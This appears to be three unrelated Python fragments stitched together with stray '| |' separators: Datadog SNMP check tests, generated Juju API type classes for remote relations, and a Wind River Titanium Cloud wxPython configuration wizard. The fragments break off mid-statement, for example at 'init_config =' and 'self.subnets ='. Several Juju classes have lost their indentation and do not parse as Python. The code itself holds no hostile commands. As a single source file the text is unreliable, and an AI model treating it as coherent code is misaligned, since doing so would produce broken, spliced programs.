def test_table_v3_SHA_DES(aggregator):
    """
    Support SNMP V3 priv modes: SHA + DES
    """
    auth = 'SHA'
    priv = 'DES'
    # NOTE(review): shorthand protocol names are passed directly here (no
    # common.AUTH_PROTOCOLS / common.PRIV_PROTOCOLS mapping, unlike
    # test_table_v3_SHA_AES) -- presumably both spellings are supported;
    # confirm intentional.
    instance = common.generate_v3_instance_config(
        common.TABULAR_OBJECTS,
        name='instance_{}_{}'.format(auth, priv),
        user='datadog{}{}'.format(auth.upper(), priv.upper()),
        auth=auth,
        auth_key=common.AUTH_KEY,
        priv=priv,
        priv_key=common.PRIV_KEY,
    )
    check = common.create_check(instance)
    check.check(instance)
    table = common.TABULAR_OBJECTS[0]
    for symbol in table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_table_v3_SHA_AES(aggregator):
    """
    Support SNMP V3 priv modes: SHA + AES
    """
    auth = 'SHA'
    priv = 'AES'
    instance = common.generate_v3_instance_config(
        common.TABULAR_OBJECTS,
        name='instance_{}_{}'.format(auth, priv),
        user='datadog{}{}'.format(auth.upper(), priv.upper()),
        auth=common.AUTH_PROTOCOLS[auth],
        auth_key=common.AUTH_KEY,
        priv=common.PRIV_PROTOCOLS[priv],
        priv_key=common.PRIV_KEY,
    )
    check = common.create_check(instance)
    check.check(instance)
    table = common.TABULAR_OBJECTS[0]
    for symbol in table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_bulk_table(aggregator):
    """Tables above the bulk threshold are fetched with GETBULK."""
    instance = common.generate_instance_config(common.BULK_TABULAR_OBJECTS)
    instance['bulk_threshold'] = 5
    check = common.create_check(instance)
    check.check(instance)
    first_table, second_table = common.BULK_TABULAR_OBJECTS[0], common.BULK_TABULAR_OBJECTS[1]
    for symbol in first_table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in first_table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    # The second table has no tag columns configured.
    for symbol in second_table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_invalid_metric(aggregator):
    """
    Invalid metrics raise a Warning and a critical service check
    """
    instance = common.generate_instance_config(common.INVALID_METRICS)
    check = common.create_check(instance)
    check.check(instance)
    # Only the service-check status is asserted here.
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.WARNING, tags=common.CHECK_TAGS, at_least=1)
def test_forcedtype_metric(aggregator):
    """
    Forced Types should be reported as metrics of the forced type
    """
    instance = common.generate_instance_config(common.FORCED_METRICS)
    check = common.create_check(instance)
    check.check(instance)
    # The native type is overridden by the forced one in each case.
    aggregator.assert_metric('snmp.IAmAGauge32', tags=common.CHECK_TAGS, count=1, metric_type=aggregator.RATE)
    aggregator.assert_metric('snmp.IAmACounter64', tags=common.CHECK_TAGS, count=1, metric_type=aggregator.GAUGE)
    aggregator.assert_metric(
        'snmp.IAmAOctetStringFloat', tags=common.CHECK_TAGS, value=3.1415, count=1, metric_type=aggregator.GAUGE
    )
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_invalid_forcedtype_metric(aggregator, caplog):
    """
    If a forced type is invalid a warning should be issued
    but the check should continue processing the remaining metrics.
    """
    instance = common.generate_instance_config(common.INVALID_FORCED_METRICS)
    check = common.create_check(instance)
    check.check(instance)
    # The run still succeeds overall...
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    # ...but the bad metric is logged.
    assert "Unable to submit metric" in caplog.text
def test_scalar_with_tags(aggregator):
    """
    Support SNMP scalar objects with tags
    """
    instance = common.generate_instance_config(common.SCALAR_OBJECTS_WITH_TAGS)
    check = common.create_check(instance)
    check.check(instance)
    # Each scalar is reported once, with its own metric_tags on top of the
    # standard check tags.
    for obj in common.SCALAR_OBJECTS_WITH_TAGS:
        name = "snmp." + (obj.get('name') or obj.get('symbol'))
        expected_tags = common.CHECK_TAGS + obj.get('metric_tags')
        aggregator.assert_metric(name, tags=expected_tags, count=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_network_failure(aggregator):
    """
    Network failure is reported in service check
    """
    instance = common.generate_instance_config(common.SCALAR_OBJECTS)
    # Point at a port nothing listens on so the connection fails.
    instance['port'] = 162
    check = common.create_check(instance)
    check.check(instance)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.CRITICAL, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_cast_metrics(aggregator):
    """String-typed OID values are cast to floats before submission."""
    instance = common.generate_instance_config(common.CAST_METRICS)
    check = common.create_check(instance)
    check.check(instance)
    for cpu_metric in ('snmp.cpuload1', 'snmp.cpuload2'):
        aggregator.assert_metric(cpu_metric, value=0.06)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_profile(aggregator):
    """An inline profile definition supplies the metrics and a profile tag."""
    instance = common.generate_instance_config([])
    instance['profile'] = 'profile1'
    profile_definition = {'metrics': common.SUPPORTED_METRIC_TYPES}
    init_config = {'profiles': {'profile1': {'definition': profile_definition}}}
    check = SnmpCheck('snmp', init_config, [instance])
    check.check(instance)
    expected_tags = common.CHECK_TAGS + ['snmp_profile:profile1']
    for metric in common.SUPPORTED_METRIC_TYPES:
        aggregator.assert_metric("snmp." + metric['name'], tags=expected_tags, count=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    common.assert_common_metrics(aggregator)
    aggregator.assert_all_metrics_covered()
def test_profile_by_file(aggregator):
    """A profile referenced via definition_file is loaded from disk."""
    instance = common.generate_instance_config([])
    instance['profile'] = 'profile1'
    with temp_dir() as tmp:
        # Write the profile definition to a YAML file and point the check at it.
        profile_file = os.path.join(tmp, 'profile1.yaml')
        with open(profile_file, 'w') as f:
            f.write(yaml.safe_dump({'metrics': common.SUPPORTED_METRIC_TYPES}))
        init_config = {'profiles': {'profile1': {'definition_file': profile_file}}}
        check = SnmpCheck('snmp', init_config, [instance])
        check.check(instance)
    expected_tags = common.CHECK_TAGS + ['snmp_profile:profile1']
    for metric in common.SUPPORTED_METRIC_TYPES:
        aggregator.assert_metric("snmp." + metric['name'], tags=expected_tags, count=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    common.assert_common_metrics(aggregator)
    aggregator.assert_all_metrics_covered()
def test_profile_sys_object(aggregator):
instance = common.generate_instance_config([])
init_config = | |
bool
suspended_reason : str
'''
application_token_ = application_token
changed_units_ = [RemoteRelationUnitChange.from_json(o) for o in changed_units or []]
departed_units_ = departed_units
force_cleanup_ = force_cleanup
life_ = life
macaroons_ = [Macaroon.from_json(o) for o in macaroons or []]
relation_token_ = relation_token
suspended_ = suspended
suspended_reason_ = suspended_reason
# Validate arguments against known Juju API types.
if application_token_ is not None and not isinstance(application_token_, (bytes, str)):
raise Exception("Expected application_token_ to be a str, received: {}".format(type(application_token_)))
if changed_units_ is not None and not isinstance(changed_units_, (bytes, str, list)):
raise Exception("Expected changed_units_ to be a Sequence, received: {}".format(type(changed_units_)))
if departed_units_ is not None and not isinstance(departed_units_, (bytes, str, list)):
raise Exception("Expected departed_units_ to be a Sequence, received: {}".format(type(departed_units_)))
if force_cleanup_ is not None and not isinstance(force_cleanup_, bool):
raise Exception("Expected force_cleanup_ to be a bool, received: {}".format(type(force_cleanup_)))
if life_ is not None and not isinstance(life_, (bytes, str)):
raise Exception("Expected life_ to be a str, received: {}".format(type(life_)))
if macaroons_ is not None and not isinstance(macaroons_, (bytes, str, list)):
raise Exception("Expected macaroons_ to be a Sequence, received: {}".format(type(macaroons_)))
if relation_token_ is not None and not isinstance(relation_token_, (bytes, str)):
raise Exception("Expected relation_token_ to be a str, received: {}".format(type(relation_token_)))
if suspended_ is not None and not isinstance(suspended_, bool):
raise Exception("Expected suspended_ to be a bool, received: {}".format(type(suspended_)))
if suspended_reason_ is not None and not isinstance(suspended_reason_, (bytes, str)):
raise Exception("Expected suspended_reason_ to be a str, received: {}".format(type(suspended_reason_)))
self.application_token = application_token_
self.changed_units = changed_units_
self.departed_units = departed_units_
self.force_cleanup = force_cleanup_
self.life = life_
self.macaroons = macaroons_
self.relation_token = relation_token_
self.suspended = suspended_
self.suspended_reason = suspended_reason_
self.unknown_fields = unknown_fields
class RemoteRelationDetails(Type):
    """Identifier for a remote relation: its token plus a discharge macaroon."""
    _toSchema = {'macaroon': 'macaroon', 'relation_token': 'relation-token'}
    _toPy = {'macaroon': 'macaroon', 'relation-token': 'relation_token'}

    def __init__(self, macaroon=None, relation_token=None, **unknown_fields):
        '''
        macaroon : Macaroon
        relation_token : str
        '''
        # Deserialize nested payloads first.
        macaroon_ = Macaroon.from_json(macaroon) if macaroon else None
        relation_token_ = relation_token
        # Validate arguments against known Juju API types.
        for value, accepted, message in (
            (macaroon_, (dict, Macaroon), "Expected macaroon_ to be a Macaroon, received: {}"),
            (relation_token_, (bytes, str), "Expected relation_token_ to be a str, received: {}"),
        ):
            if value is not None and not isinstance(value, accepted):
                raise Exception(message.format(type(value)))
        self.macaroon = macaroon_
        self.relation_token = relation_token_
        self.unknown_fields = unknown_fields
class RemoteRelationResult(Type):
    """Single API result: a RemoteRelation payload or an Error."""
    _toSchema = {'error': 'error', 'result': 'result'}
    _toPy = {'error': 'error', 'result': 'result'}

    def __init__(self, error=None, result=None, **unknown_fields):
        '''
        error : Error
        result : RemoteRelation
        '''
        # Deserialize nested payloads first.
        error_ = Error.from_json(error) if error else None
        result_ = RemoteRelation.from_json(result) if result else None
        # Validate arguments against known Juju API types.
        for value, accepted, message in (
            (error_, (dict, Error), "Expected error_ to be a Error, received: {}"),
            (result_, (dict, RemoteRelation), "Expected result_ to be a RemoteRelation, received: {}"),
        ):
            if value is not None and not isinstance(value, accepted):
                raise Exception(message.format(type(value)))
        self.error = error_
        self.result = result_
        self.unknown_fields = unknown_fields
class RemoteRelationResults(Type):
    _toSchema = {'results': 'results'}
    _toPy = {'results': 'results'}

    def __init__(self, results=None, **unknown_fields):
        '''
        results : typing.Sequence[~RemoteRelationResult]
        '''
        # Decode each element of the sequence from its JSON form.
        decoded_results = [RemoteRelationResult.from_json(item) for item in results or []]
        # Schema check kept for parity with the generated validators
        # (always true here, since the comprehension yields a list).
        if not (decoded_results is None or isinstance(decoded_results, (bytes, str, list))):
            raise Exception("Expected results_ to be a Sequence, received: {}".format(type(decoded_results)))
        self.results = decoded_results
        self.unknown_fields = unknown_fields
class RemoteRelationUnit(Type):
    _toSchema = {'macaroons': 'macaroons', 'relation_token': 'relation-token', 'unit': 'unit'}
    _toPy = {'macaroons': 'macaroons', 'relation-token': 'relation_token', 'unit': 'unit'}

    def __init__(self, macaroons=None, relation_token=None, unit=None, **unknown_fields):
        '''
        macaroons : typing.Sequence[~Macaroon]
        relation_token : str
        unit : str
        '''
        # Decode nested wire payloads before type checking.
        decoded_macaroons = [Macaroon.from_json(item) for item in macaroons or []]
        token = relation_token
        unit_name = unit
        # Reject values that do not match the Juju API schema.
        if not (decoded_macaroons is None or isinstance(decoded_macaroons, (bytes, str, list))):
            raise Exception("Expected macaroons_ to be a Sequence, received: {}".format(type(decoded_macaroons)))
        if not (token is None or isinstance(token, (bytes, str))):
            raise Exception("Expected relation_token_ to be a str, received: {}".format(type(token)))
        if not (unit_name is None or isinstance(unit_name, (bytes, str))):
            raise Exception("Expected unit_ to be a str, received: {}".format(type(unit_name)))
        self.macaroons = decoded_macaroons
        self.relation_token = token
        self.unit = unit_name
        self.unknown_fields = unknown_fields
class RemoteRelationUnitChange(Type):
    _toSchema = {'settings': 'settings', 'unit_id': 'unit-id'}
    _toPy = {'settings': 'settings', 'unit-id': 'unit_id'}

    def __init__(self, settings=None, unit_id=None, **unknown_fields):
        '''
        settings : typing.Mapping[str, typing.Any]
        unit_id : int
        '''
        raw_settings = settings
        raw_unit_id = unit_id
        # Reject values that do not match the Juju API schema.
        if not (raw_settings is None or isinstance(raw_settings, dict)):
            raise Exception("Expected settings_ to be a Mapping, received: {}".format(type(raw_settings)))
        if not (raw_unit_id is None or isinstance(raw_unit_id, int)):
            raise Exception("Expected unit_id_ to be a int, received: {}".format(type(raw_unit_id)))
        self.settings = raw_settings
        self.unit_id = raw_unit_id
        self.unknown_fields = unknown_fields
class RemoteRelationUnits(Type):
    _toSchema = {'relation_units': 'relation-units'}
    _toPy = {'relation-units': 'relation_units'}

    def __init__(self, relation_units=None, **unknown_fields):
        '''
        relation_units : typing.Sequence[~RemoteRelationUnit]
        '''
        # Decode each element of the sequence from its JSON form.
        decoded_units = [RemoteRelationUnit.from_json(item) for item in relation_units or []]
        # Schema check kept for parity with the generated validators.
        if not (decoded_units is None or isinstance(decoded_units, (bytes, str, list))):
            raise Exception("Expected relation_units_ to be a Sequence, received: {}".format(type(decoded_units)))
        self.relation_units = decoded_units
        self.unknown_fields = unknown_fields
class RemoteRelationsChange(Type):
    _toSchema = {'changed': 'changed', 'initial': 'initial', 'removed': 'removed'}
    _toPy = {'changed': 'changed', 'initial': 'initial', 'removed': 'removed'}

    def __init__(self, changed=None, initial=None, removed=None, **unknown_fields):
        '''
        changed : typing.Sequence[~RemoteRelationChange]
        initial : bool
        removed : typing.Sequence[int]
        '''
        # Decode nested wire payloads before type checking.
        decoded_changed = [RemoteRelationChange.from_json(item) for item in changed or []]
        initial_flag = initial
        removed_ids = removed
        # Reject values that do not match the Juju API schema.
        if not (decoded_changed is None or isinstance(decoded_changed, (bytes, str, list))):
            raise Exception("Expected changed_ to be a Sequence, received: {}".format(type(decoded_changed)))
        if not (initial_flag is None or isinstance(initial_flag, bool)):
            raise Exception("Expected initial_ to be a bool, received: {}".format(type(initial_flag)))
        if not (removed_ids is None or isinstance(removed_ids, (bytes, str, list))):
            raise Exception("Expected removed_ to be a Sequence, received: {}".format(type(removed_ids)))
        self.changed = decoded_changed
        self.initial = initial_flag
        self.removed = removed_ids
        self.unknown_fields = unknown_fields
class RemoteRelationsChanges(Type):
    _toSchema = {'changes': 'changes'}
    _toPy = {'changes': 'changes'}

    def __init__(self, changes=None, **unknown_fields):
        '''
        changes : typing.Sequence[~RemoteRelationChangeEvent]
        '''
        # Decode each element of the sequence from its JSON form.
        decoded_changes = [RemoteRelationChangeEvent.from_json(item) for item in changes or []]
        # Schema check kept for parity with the generated validators.
        if not (decoded_changes is None or isinstance(decoded_changes, (bytes, str, list))):
            raise Exception("Expected changes_ to be a Sequence, received: {}".format(type(decoded_changes)))
        self.changes = decoded_changes
        self.unknown_fields = unknown_fields
class RemoteRelationsWatchResult(Type):
    _toSchema = {'change': 'change', 'error': 'error', 'remoterelationswatcherid': 'RemoteRelationsWatcherId'}
    _toPy = {'RemoteRelationsWatcherId': 'remoterelationswatcherid', 'change': 'change', 'error': 'error'}

    def __init__(self, remoterelationswatcherid=None, change=None, error=None, **unknown_fields):
        '''
        remoterelationswatcherid : str
        change : RemoteRelationsChange
        error : Error
        '''
        # Decode nested wire payloads before type checking.
        watcher_id = remoterelationswatcherid
        decoded_change = RemoteRelationsChange.from_json(change) if change else None
        decoded_error = Error.from_json(error) if error else None
        # Reject values that do not match the Juju API schema.
        if not (watcher_id is None or isinstance(watcher_id, (bytes, str))):
            raise Exception("Expected remoterelationswatcherid_ to be a str, received: {}".format(type(watcher_id)))
        if not (decoded_change is None or isinstance(decoded_change, (dict, RemoteRelationsChange))):
            raise Exception("Expected change_ to be a RemoteRelationsChange, received: {}".format(type(decoded_change)))
        if not (decoded_error is None or isinstance(decoded_error, (dict, Error))):
            raise Exception("Expected error_ to be a Error, received: {}".format(type(decoded_error)))
        self.remoterelationswatcherid = watcher_id
        self.change = decoded_change
        self.error = decoded_error
        self.unknown_fields = unknown_fields
class RemoteSpace(Type):
_toSchema = {'cloud_type': 'cloud-type', 'name': 'name', 'provider_attributes': 'provider-attributes', 'provider_id': 'provider-id', 'subnets': 'subnets'}
_toPy = {'cloud-type': 'cloud_type', 'name': 'name', 'provider-attributes': 'provider_attributes', 'provider-id': 'provider_id', 'subnets': 'subnets'}
def __init__(self, cloud_type=None, name=None, provider_attributes=None, provider_id=None, subnets=None, **unknown_fields):
'''
cloud_type : str
name : str
provider_attributes : typing.Mapping[str, typing.Any]
provider_id : str
subnets : typing.Sequence[~Subnet]
'''
cloud_type_ = cloud_type
name_ = name
provider_attributes_ = provider_attributes
provider_id_ = provider_id
subnets_ = [Subnet.from_json(o) for o in subnets or []]
# Validate arguments against known Juju API types.
if cloud_type_ is not None and not isinstance(cloud_type_, (bytes, str)):
raise Exception("Expected cloud_type_ to be a str, received: {}".format(type(cloud_type_)))
if name_ is not None and not isinstance(name_, (bytes, str)):
raise Exception("Expected name_ to be a str, received: {}".format(type(name_)))
if provider_attributes_ is not None and not isinstance(provider_attributes_, dict):
raise Exception("Expected provider_attributes_ to be a Mapping, received: {}".format(type(provider_attributes_)))
if provider_id_ is not None and not isinstance(provider_id_, (bytes, str)):
raise Exception("Expected provider_id_ to be a str, received: {}".format(type(provider_id_)))
if subnets_ is not None and not isinstance(subnets_, (bytes, str, list)):
raise Exception("Expected subnets_ to be a Sequence, received: {}".format(type(subnets_)))
self.cloud_type = cloud_type_
self.name = name_
self.provider_attributes = provider_attributes_
self.provider_id = provider_id_
self.subnets = | |
"""
Copyright (c) 2015-2017 Wind River Systems, Inc.
SPDX-License-Identifier: Apache-2.0
"""
from collections import OrderedDict
from six.moves import configparser
import wx
import wx.wizard as wiz
import wx.lib.dialogs
import wx.lib.scrolledpanel
from configutilities.common.configobjects import REGION_CONFIG
from configutilities.common.configobjects import DEFAULT_CONFIG
from configutilities.common.exceptions import ValidateFail
from configutilities.common.guicomponents import Field
from configutilities.common.guicomponents import TYPES
from configutilities.common.guicomponents import prepare_fields
from configutilities.common.guicomponents import on_change
from configutilities.common.guicomponents import debug
from configutilities.common.guicomponents import set_icons
from configutilities.common.guicomponents import TEXT_WIDTH
from configutilities.common.guicomponents import VGAP
from configutilities.common.guicomponents import HGAP
from configutilities.common.validator import ConfigValidator
from configutilities.common.validator import TiS_VERSION
# Pixel padding used for widget spacing on every wizard page.
PADDING = 5
# Validation profile passed to ConfigValidator; presumably switched to
# REGION_CONFIG when configuring a secondary region -- TODO confirm.
CONFIG_TYPE = DEFAULT_CONFIG
# Config parser to hold current configuration
filename = None  # name of the last configuration file read (set in STARTPage.on_read)
filedir = None  # directory of that file (set in STARTPage.on_read)
config = configparser.RawConfigParser()
# Preserve option-name case; RawConfigParser lowercases option names by default.
config.optionxform = str
def print_config(conf=None):
    """Dump the contents of a config parser to the debug log.

    :param conf: config parser to dump; defaults to the module-level
        ``config``, resolved at call time (so a rebound global -- e.g.
        after a failed file read in STARTPage.on_read -- is picked up).
    """
    if conf is None:
        conf = config
    debug('======CONFIG CONTENTS======')
    # Bug fix: previously this dumped the global ``config`` regardless of
    # the ``conf`` argument, silently ignoring the caller's parser.
    debug(get_config(conf))
    debug('======END CONFIG======')
def get_config(conf=None):
    """Render a config parser as INI-style text.

    :param conf: config parser to render; defaults to the module-level
        ``config``, resolved at call time rather than at definition time
        (the old def-time default kept pointing at a stale parser object
        if the global was ever rebound).
    :returns: a string with one ``[section]`` header per section followed
        by ``option=value`` lines.
    """
    if conf is None:
        conf = config
    parts = []
    for section in conf.sections():
        parts.append("\n[" + section + "]" + "\n")
        # Bug fix: the original iterated ``config.options``/``config.get``
        # (the global) here, so passing a different parser dumped the
        # wrong configuration.
        for option in conf.options(section):
            parts.append(option + "=" + conf.get(section, option) + "\n")
    return "".join(parts)
def get_opt(section, option):
    """Return *option* from *section* of the global config, or None if absent."""
    if config.has_section(section) and config.has_option(section, option):
        return config.get(section, option)
    return None
class ConfigWizard(wx.wizard.Wizard):
    """Titanium Cloud configuration wizard.

    Holds the ordered list of pages (mostly ConfigPages, which carry the
    question/answer fields) and drives page rebuilding and validation
    through the wx wizard events.
    """
    def __init__(self):
        wx.wizard.Wizard.__init__(self, None, -1,
                                  "Titanium Cloud Configuration File "
                                  "Creator v" + TiS_VERSION)
        set_icons(self)
        self.pages = []
        # Catch wizard events
        self.Bind(wiz.EVT_WIZARD_PAGE_CHANGED, self.on_page_changed)
        self.Bind(wiz.EVT_WIZARD_PAGE_CHANGING, self.on_page_changing)
        self.Bind(wiz.EVT_WIZARD_CANCEL, self.on_cancel)
        self.Bind(wiz.EVT_WIZARD_FINISHED, self.on_finished)
        # Registration order defines the wizard flow; individual pages
        # may be skipped at runtime via skip_page().
        self.add_page(STARTPage(self))
        self.add_page(REGIONPage(self))
        self.add_page(SHAREDSERVICESPage(self))
        self.add_page(REG2SERVICESPage(self))
        self.add_page(REG2SERVICESPage2(self))
        self.add_page(SYSTEMPage(self))
        self.add_page(PXEBootPage(self))
        self.add_page(MGMTPage(self))
        self.add_page(INFRAPage(self))
        self.add_page(OAMPage(self))
        self.add_page(AUTHPage(self))
        self.add_page(ENDPage(self))
        # Fixed page size; pages scroll internally (ScrolledPanel), so
        # there is no need to measure every page up front.
        size = self.GetBestSize()
        size.SetWidth(560)
        size.SetHeight(530)
        self.SetPageSize(size)
        self.GetSizer().Layout()

    def add_page(self, page):
        """Append *page* and wire it into the doubly-linked page chain."""
        if self.pages:
            previous_page = self.pages[-1]
            page.SetPrev(previous_page)
            previous_page.SetNext(page)
        self.pages.append(page)

    def run(self):
        """Start the wizard at the first page (blocks until finished)."""
        self.RunWizard(self.pages[0])

    def on_page_changed(self, evt):
        """Executed after the page has changed: rebuild the new page."""
        page = evt.GetPage()
        if evt.GetDirection():
            # Moving forward: rebuild from scratch so stale widgets and
            # field state are not reused.
            page.DestroyChildren()
            page.load()

    def on_page_changing(self, evt):
        """Executed before the page changes; vetoes the move on validation errors."""
        page = evt.GetPage()
        # Perform the page validation
        if evt.GetDirection():
            try:
                page.validate_page()
            except Exception as ex:
                # Bug fix: Python 3 exceptions have no ``.message``
                # attribute (removed with PEP 352); str(ex) is portable
                # across Python 2 and 3.
                dlg = wx.MessageDialog(
                    self,
                    str(ex),
                    "Error on page")
                dlg.ShowModal()
                # Do not allow progress if errors were raised
                evt.Veto()

    def on_cancel(self, evt):
        """On cancel button press, not used for now"""
        pass

    def on_finished(self, evt):
        """On finish button press, not used for now"""
        pass

    def skip_page(self, page, skip):
        """Mark the wizard's instance of *page* (a page class) as skipped or not."""
        for p in self.pages:
            if p.__class__.__name__ == page.__name__:
                p.skip = skip
class WizardPage(wiz.PyWizardPage):
    """ An extended panel obj with a few methods to keep track of its siblings.
    This should be modified and added to the wizard. Season to taste."""
    def __init__(self, parent):
        wx.wizard.PyWizardPage.__init__(self, parent)
        self.parent = parent
        self.title = ""
        # Doubly-linked page chain, maintained by ConfigWizard.add_page().
        self.next = self.prev = None
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.SetSizer(self.sizer)
        # When True, GetNext()/GetPrev() skip over this page.
        self.skip = False
    def set_title(self, title_text):
        # Large bold heading followed by a separator line.
        title = wx.StaticText(self, -1, title_text)
        title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
        self.sizer.AddWindow(title, 0, wx.ALIGN_LEFT | wx.ALL, PADDING)
        self.add_line()
    def add_content(self, content, proportion=0):
        """Add additional widgets to the bottom of the page"""
        self.sizer.Add(content, proportion, wx.EXPAND | wx.ALL, PADDING)
    def add_line(self):
        # Horizontal rule spanning the page width.
        self.sizer.AddWindow(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.ALL,
                             PADDING)
    def SetNext(self, next):
        """Set the next page"""
        self.next = next
    def SetPrev(self, prev):
        """Set the previous page"""
        self.prev = prev
    def GetNext(self):
        """Return the next page, transparently skipping pages marked skip."""
        if self.next and self.next.skip:
            return self.next.GetNext()
        return self.next
    def GetPrev(self):
        """Return the previous page, transparently skipping pages marked skip."""
        if self.prev and self.prev.skip:
            return self.prev.GetPrev()
        return self.prev
    def load(self):
        # Run every time a page is visited (from prev or next page)
        pass
    def validate_page(self):
        # Validate the config related to this specific page before advancing
        pass
class ConfigPage(WizardPage):
    """ A Page of the wizard with questions/answers
    """
    def __init__(self, *args, **kwargs):
        super(ConfigPage, self).__init__(*args, **kwargs)
        # Section header to put in the INI file
        self.section = ""
        # Methods of the config_validator to be called for this section
        self.validator_methods = []
        # Page heading and introductory help paragraph.
        self.title = ""
        self.help_text = ""
        # name -> Field, in display order.
        self.fields = OrderedDict()
    def load(self):
        # Reset all page state; subclasses assign their own values after
        # calling this and then call do_setup().
        self.title = ""
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.SetSizer(self.sizer)
        self.section = ""
        self.title = ""
        self.help_text = ""
        # Destroy the old field widgets so rebuilt pages do not leak
        # controls.
        for field in self.fields.values():
            field.destroy()
        self.fields = OrderedDict()
    def do_setup(self):
        # Reset page, in case fields have changed
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.SetSizer(self.sizer)
        # Set up title and help text
        self.set_title(self.title)
        if self.help_text:
            help_text = wx.StaticText(self, -1, self.help_text)
            help_text.Wrap(TEXT_WIDTH)
            self.add_content(help_text)
            self.add_line()
        # Fields live on a scrolled panel so tall pages stay usable.
        self.spanel = wx.lib.scrolledpanel.ScrolledPanel(self, -1)
        # to view spanel: , style=wx.SIMPLE_BORDER)
        self.add_content(self.spanel, 3)
        # Add fields to page
        # gridSizer = wx.FlexGridSizer(rows=6, cols=2, vgap=10,
        #                              hgap=10)
        self.gridSizer = wx.GridBagSizer(vgap=VGAP, hgap=HGAP)
        # gridSizer.SetFlexibleDirection(wx.VERTICAL)
        # gridSizer.SetFlexibleDirection(wx.BOTH)
        self.spanel.SetSizer(self.gridSizer)
        self.spanel.SetupScrolling()
        # self.add_content(gridSizer)
        prepare_fields(self.spanel, self.fields, self.gridSizer,
                       self.on_change)
        self.Layout()
        self.spanel.Layout()
    def on_change(self, event):
        # Delegate show/hide handling of dependent fields to guicomponents.
        on_change(self, self.fields, event)
    def validate_page(self):
        # Gets the config from the current page, then sends to the validator
        self.get_config()
        print_config(config)
        # The validator runs over the accumulated global config, not just
        # this page's section.
        validator = ConfigValidator(config, None, CONFIG_TYPE, True)
        mode = get_opt('SYSTEM', 'SYSTEM_MODE')
        if mode:
            validator.set_system_mode(mode)
        dc_role = get_opt('SYSTEM', 'DISTRIBUTED_CLOUD_ROLE')
        if dc_role:
            validator.set_system_dc_role(dc_role)
        # Each page lists which validator checks apply to it.
        for method in self.validator_methods:
            getattr(validator, method)()
    def get_config(self):
        # Removes possibly out-dated config section so it can be over-written
        if config.has_section(self.section):
            config.remove_section(self.section)
        self.add_fields()
    def add_fields(self):
        # Adds the page's section to the config object if necessary
        if not config.has_section(self.section):
            config.add_section(self.section)
        # Add all of the non-transient fields (straight-forward mapping)
        for name, field in self.fields.items():
            if not field.transient and field.get_value():
                config.set(self.section, name, field.get_value())
    def bind_events(self):
        # Hook for subclasses that need extra event bindings.
        pass
class STARTPage(WizardPage):
    # Introductory page: static welcome text only, no configuration fields.
    def load(self):
        super(STARTPage, self).load()
        self.set_title("Start")
        help_text = wx.StaticText(
            self, -1,
            "Welcome to the Titanium Cloud Configuration File "
            "Creator.\n\n"
            "This wizard will walk you through the steps of creating a "
            "configuration file which can be used to automate the "
            "installation of Titanium Cloud. Note this utility can only be "
            "used to create configuration files compatible with version " +
            TiS_VERSION + " of Titanium Cloud.\n\n"
            "NOTE: Moving backwards in the wizard will result in loss of the "
            "current page's configuration and will need to be reentered\n\n"
            "Press next to begin.\n\n\n\n")
        help_text.Wrap(TEXT_WIDTH)
        self.add_content(help_text)
        # self.add_line()
        # To implement this, would need special mapping for every page...
        # (from config to control)
        # putting this on the long(er)-term todo list for now
        # self.add_content(wx.StaticText(
        #    self, -1,
        #    'You may optionally pre-populate this utility by reading in an '
        #    'existing Titanium Cloud configuration file'))
        # self.load_button = wx.Button(self, -1, "Load Configuration File "
        #                                        "(Optional)")
        # self.Bind(wx.EVT_BUTTON, self.on_read, self.load_button)
